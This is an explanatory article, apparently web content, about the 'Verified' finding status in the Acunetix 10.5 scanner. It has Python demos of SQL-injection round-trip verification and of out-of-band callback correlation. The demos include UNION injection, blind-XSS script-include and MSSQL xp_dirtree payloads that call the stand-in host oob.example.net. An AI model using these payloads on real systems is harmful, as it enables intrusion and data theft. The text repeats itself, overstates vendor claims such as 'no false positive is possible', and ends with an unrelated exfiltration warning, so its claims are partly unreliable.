Acunetix 10.5 Verified

Acunetix version 10.5 introduced the "Verified" feature, designed to eliminate false positives by automatically confirming vulnerabilities such as SQL injection and XSS through AcuSensor (IAST) or AcuMonitor. A verified finding can be treated with 100% confidence, and each one comes with an actionable proof of concept (PoC) that streamlines remediation for development teams. For more details on the verification process, see the Acunetix support article "AcuMonitor, AcuSensor, and the Acunetix Verified Badge".

The phrase "Acunetix 105 verified" is the version number 10.5 written without the dot. It refers to a finding status in the Acunetix Web Vulnerability Scanner indicating that the reported vulnerability has been confirmed by the software itself, so it is not a false positive.

Below is the descriptive text typically associated with this status in security reports:

Acunetix Verification Overview

Status: Verified

This indicates that the scanner has successfully performed a safe automated exploit, or a round-trip proof of concept, to confirm that the vulnerability exists. The "105" in the search phrase is not a confidence marker; it is the version number 10.5 with the dot dropped. Certainty is expressed in the scanner's Confidence % column, and only findings at 100% carry the Verified badge, which is why manual re-testing is generally not required to prove the flaw exists.

Typical Report Text

If you are looking for the boilerplate text used in these findings, it usually follows this structure:

Vulnerability Confirmed

"Acunetix has successfully verified this vulnerability. This means that the scanner was able to prove the existence of the vulnerability by performing a safe exploit or by receiving a specific response that is only possible if the vulnerability is present. No false positive is possible for this finding."

Key Implications

Zero False Positives: The "Verified" badge is designed to save security researchers time by filtering out "Possible" or "Inferred" risks.

Immediate Action: Because the risk is confirmed, these items should be prioritized for immediate patching or mitigation.

Proof of Concept (PoC): Acunetix typically includes, in the "Vulnerability Details" section, the specific HTTP request and response that triggered the Verified status.
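The difference between a "Possible" or "Inferred" finding and a Verified one is the round-trip proof described above: the scanner injects something and demands a response that can only occur if the injection actually executed. The Python block below is an added example, not Acunetix code, that models this for SQL injection against a constructed in-memory sqlite database. It contains an error-based inference check, a nonce-echo verification check, and three hypothetical endpoints: one injectable, one parameterized, and one parameterized but with a chatty input filter that answers any quote with a "Database error" message and therefore fools the inference check. All function names, the endpoint shapes and the sample data are assumptions for illustration.

```python
import secrets
import sqlite3


def make_db():
    """Constructed sample database standing in for the target application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products (name) VALUES (?)", [("Widget",), ("Gadget",)])
    return conn


def vulnerable_search(conn, term):
    """Hypothetical endpoint built by string concatenation, so the parameter is injectable."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "500 Database error: " + str(exc)
    return "200 " + ", ".join(r[0] for r in rows)


def safe_search(conn, term):
    """The same endpoint with a bound parameter; must never be reported as Verified."""
    rows = conn.execute(
        "SELECT name FROM products WHERE name LIKE ?", ("%" + term + "%",)
    ).fetchall()
    return "200 " + ", ".join(r[0] for r in rows)


def noisy_safe_search(conn, term):
    """Parameterized, hence not injectable, but its input filter answers any quote with a
    'Database error' message, which is enough to fool an error-based inference check."""
    if "'" in term:
        return "500 Database error: invalid characters in search term"
    return safe_search(conn, term)


def infer_sqli(send):
    """'Possible'/'Inferred' check: a lone quote produces a database error. Suggestive only."""
    return "Database error" in send("'")


def verify_sqli(send):
    """Round-trip proof: inject a fresh nonce via UNION and require it to come back in a
    successful response. Only executed SQL can produce that output, so an error page or a
    normal result page is not accepted as evidence."""
    nonce = secrets.token_hex(8)
    response = send("x%' UNION SELECT '" + nonce + "' -- ")
    return response.startswith("200") and nonce in response


def classify(send):
    """Mirror the scanner's ladder: Verified outranks Possible, which outranks nothing."""
    if verify_sqli(send):
        return "Verified"
    if infer_sqli(send):
        return "Possible"
    return "Not detected"


def demo():
    """Classify the three hypothetical endpoints and return the verdicts."""
    conn = make_db()
    return {
        "vulnerable": classify(lambda t: vulnerable_search(conn, t)),
        "safe": classify(lambda t: safe_search(conn, t)),
        "noisy_safe": classify(lambda t: noisy_safe_search(conn, t)),
    }


if __name__ == "__main__":
    print(demo())
```

The noisy endpoint is the one worth studying: an inference check alone would report it as injectable, while the nonce round trip correctly refuses to, which is exactly the triage time the Verified badge is meant to save.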

Understanding the Acunetix Verified Badge: A Deep Dive

The Acunetix Verified badge is a mark of confidence within the Acunetix Vulnerability Scanner. It signifies that a detected vulnerability has been automatically confirmed by the scanner with 100% confidence, removing the need for manual verification by security teams.

Core Mechanism of Verification

The "Verified" status is achieved through high-confidence detection methods that prove a vulnerability is exploitable without causing harm.

100% Confidence Level: When a vulnerability is displayed in the Acunetix interface, it includes a Confidence % column. Items marked 100% are automatically granted the Acunetix Verified badge.

Proof of Concept (PoC): For many high-risk vulnerabilities, such as Cross-site Scripting (XSS) or SQL Injection, Acunetix generates a safe PoC to demonstrate that the issue is real and exploitable.

Gray-Box Testing: AcuSensor gives the scanner visibility into the application's source code and server-side environment, allowing it to pinpoint the exact line of code responsible for the flaw, which contributes to the verification rate.

Benefits for Security Teams

The integration of verified vulnerabilities into a security workflow provides several operational advantages:

Elimination of False Positives: Traditional scanners often flag "potential" issues that turn out to be harmless. Verified results ensure that security professionals do not waste time investigating "ghost" vulnerabilities.

Prioritized Remediation: Since these issues are confirmed as real, teams can immediately prioritize them for fixing, often pushing them directly into issue trackers like Jira or GitHub.

Detailed Evidence: When viewing a verified vulnerability, Acunetix provides attack details, potential impact, and remediation steps.

How to Access Verified Results

Run a Scan: Initiate a scan on your target URL.

Navigate to Vulnerabilities: Select the Vulnerabilities tab from the left-side menu.

Apply Filters: Use the filter bar to display only results with a Confidence level of 100 percent.

Review the Badge: Double-click a vulnerability to see the Acunetix Verified badge in the detailed view.

Advanced Features Supporting Verification

AcuMonitor: Facilitates the detection of vulnerabilities that do not provide an immediate response to the scanner, such as Blind XSS or Out-of-band SQLi.

Reporting: You can generate a Detailed Scan Report that specifically highlights these confirmed vulnerabilities for stakeholders.


The Verified badge is a feature of the Acunetix vulnerability scanner designed to eliminate manual double-checking for security teams.

Core Concept: The "Verified" Badge

When Acunetix performs a scan, it assigns a Verified badge to specific vulnerabilities. The badge serves as a digital "proof of exploit", signalling that the scanner has confirmed with 100% confidence that the vulnerability exists.

No False Positives: The primary purpose of this feature is to let developers and security professionals skip the triage phase. If an issue is marked as verified, you can begin remediation immediately without worrying that it is a false alarm.

Proof of Concept (PoC): For many verified vulnerabilities, Acunetix provides a PoC, such as the actual data extracted from a database in a SQL Injection or the specific script executed in Cross-Site Scripting (XSS).

How It Works: Technical Implementation

The "Verified" status is often achieved through the combination of two proprietary technologies:

AcuSensor (IAST): An Interactive Application Security Testing (IAST) sensor installed inside the application code. It gives the scanner "eyes" inside the backend, allowing it to see exactly how a malicious payload travels through the code.

AcuMonitor: This component handles "out-of-band" vulnerabilities, issues that produce no immediate response to the scanner but trigger a call to an external server. AcuMonitor catches these call-backs and uses them to confirm the vulnerability.

Key Benefits for Teams

Faster Remediation: Security teams can send verified issues directly to developers through issue-tracker integrations, trusting that the report is accurate.

Focus on Logic: By automating the verification of common flaws (like SQLi or XSS), expert penetration testers can spend more time on complex business-logic vulnerabilities that require human judgement.

Compliance Ready: Verified vulnerabilities carry more weight in compliance reports (for PCI DSS or HIPAA, for example), as they provide concrete evidence of a security gap.
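The out-of-band confirmation described for AcuMonitor above rests on correlation: every injected payload points at a hostname that embeds a token unique to that injection point, and a finding counts as verified only when the listener records a callback carrying that token. The Python block below is an added example, not AcuMonitor's or Acunetix's code, that implements that correlation over constructed listener log lines and handles the cases a practitioner cares about: duplicate callbacks are counted once, callbacks with unknown tokens (random scanning of the listener) are ignored, traffic for another domain is ignored, and points whose token never calls back are reported as unconfirmed rather than as safe. The listener domain, the log-line format and the payload shapes (a blind-XSS script include and the classic MSSQL xp_dirtree UNC-path lookup) are assumptions for illustration.

```python
import re
import secrets

# Constructed listener domain standing in for an AcuMonitor-style callback service.
LISTENER = "oob.example.net"


class OobVerifier:
    """Tracks one unique token per injection point and marks a finding verified
    only when the listener log shows a callback carrying that token."""

    # Constructed log-line format: "<timestamp> <DNS|HTTP> <detail> <token>.<domain> from <source-ip>"
    LINE_RE = re.compile(
        r"^(?P<ts>\S+) (?P<proto>DNS|HTTP) (?P<detail>.+?) "
        r"(?P<token>[0-9a-f]{12})\.(?P<domain>\S+) from (?P<src>\S+)$"
    )

    def __init__(self, listener=LISTENER):
        self.listener = listener
        self.pending = {}   # token -> injection point awaiting a callback
        self.verified = {}  # token -> (injection point, evidence string)

    def payload_for(self, url, param, vuln_class):
        """Register an injection point and return (token, payload) for it."""
        token = secrets.token_hex(6)
        self.pending[token] = {"url": url, "param": param, "class": vuln_class}
        host = f"{token}.{self.listener}"
        if vuln_class == "blind_xss":
            return token, f'"><script src="https://{host}/x.js"></script>'
        if vuln_class == "oob_sqli":
            # Classic MSSQL out-of-band trick: xp_dirtree on a UNC path forces a DNS lookup.
            return token, f"';EXEC master..xp_dirtree '\\\\{host}\\a'--"
        raise ValueError(f"unsupported class {vuln_class}")

    def ingest(self, log_lines):
        """Consume listener log lines; return the injection points they newly verify."""
        newly = []
        for line in log_lines:
            m = self.LINE_RE.match(line)
            if not m or m["domain"] != self.listener:
                continue  # malformed line, or traffic for some other listener
            point = self.pending.pop(m["token"], None)
            if point is None:
                continue  # unknown or already-consumed token: ignore, never double-count
            evidence = f"{m['proto']} callback from {m['src']} at {m['ts']} ({m['detail']})"
            self.verified[m["token"]] = (point, evidence)
            newly.append((point, evidence))
        return newly

    def unconfirmed(self):
        """Points whose token never called back: not verified, but not proven safe either."""
        return list(self.pending.values())


def demo():
    """Run the correlation over a constructed listener log and return a summary."""
    v = OobVerifier()
    t_xss, _ = v.payload_for("https://target.example/search", "q", "blind_xss")
    t_sql, _ = v.payload_for("https://target.example/login", "user", "oob_sqli")
    v.payload_for("https://target.example/feedback", "msg", "blind_xss")
    lines = [  # constructed listener log lines
        f"2024-05-01T10:00:01Z DNS A {t_sql}.oob.example.net from 203.0.113.5",
        f"2024-05-01T10:00:03Z HTTP GET /x.js {t_xss}.oob.example.net from 198.51.100.7",
        f"2024-05-01T10:00:04Z HTTP GET /x.js {t_xss}.oob.example.net from 198.51.100.7",  # duplicate
        "2024-05-01T10:00:05Z DNS A deadbeefcafe.oob.example.net from 192.0.2.9",  # unknown token
        "2024-05-01T10:00:06Z DNS A 0123456789ab.other.example.org from 192.0.2.9",  # other listener
        "not a listener line",
    ]
    newly = v.ingest(lines)
    return {
        "newly_verified": sorted(p["param"] for p, _ in newly),
        "verified_total": len(v.verified),
        "unconfirmed": [p["param"] for p in v.unconfirmed()],
    }


if __name__ == "__main__":
    print(demo())
```

The token is what turns a DNS or HTTP hit into proof: a callback to the listener without a token the verifier issued could come from anyone, so it is evidence of nothing, and a point that never calls back stays in the pending set for a human to look at rather than silently disappearing.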

Limitations: What Acunetix 10.5 Verified Does NOT Do

No tool or methodology is perfect. A Verified status confirms only the specific finding it is attached to: it does not mean that findings without the badge are false positives, and it does not cover business-logic flaws that require human testing.

For complete security, use verified scans in conjunction with manual penetration testing of the areas the scanner cannot prove.

Where it could be better

Data Exfiltration

A "verified" build obtained from an untrusted source could quietly scan your local files, browser credentials and development projects, then send them to a command-and-control server. You might scan a client's website for vulnerabilities while unknowingly exposing their source code to attackers.


